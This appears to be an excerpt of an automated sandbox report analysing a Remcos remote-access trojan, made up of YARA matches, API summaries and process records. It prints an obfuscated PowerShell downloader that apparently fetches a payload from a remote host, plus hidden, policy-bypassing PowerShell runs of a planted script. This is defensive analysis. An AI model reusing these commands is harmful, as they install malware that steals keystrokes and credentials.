                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,20_2_0040A41B
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3340320354.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041CA73 SystemParametersInfoW,20_2_0041CA73

                      System Summary

                      barindex
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 5236, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1436, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1436, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeAJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00401806 NtdllDefWindowProc_W,21_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_004018C0 NtdllDefWindowProc_W,21_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_004167EF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D42DFA2_2_00007FF848D42DFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E52E115_2_00007FF848E52E11
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848E333166_2_00007FF848E33316
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848E20EE313_2_00007FF848E20EE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_1001719415_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_1000B5C115_2_1000B5C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF848E30EE318_2_00007FF848E30EE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043706A20_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041400520_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043E11C20_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004541D920_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004381E820_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041F18B20_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0044627020_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043E34B20_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004533AB20_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0042742E20_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043756620_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043E5A820_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004387F020_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043797E20_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004339D720_2_004339D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0044DA4920_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00427AD720_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041DBF320_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00427C4020_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00437DB320_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00435EEB20_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043DEED20_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00426E9F20_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044B04021_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0043610D21_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044731021_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044A49021_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040755A21_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0043C56021_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044B61021_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044D6C021_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_004476F021_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044B87021_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044081D21_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0041495721_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_004079EE21_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00407AEB21_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044AA8021_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00412AA921_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00404B7421_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00404B0321_2_00404B03
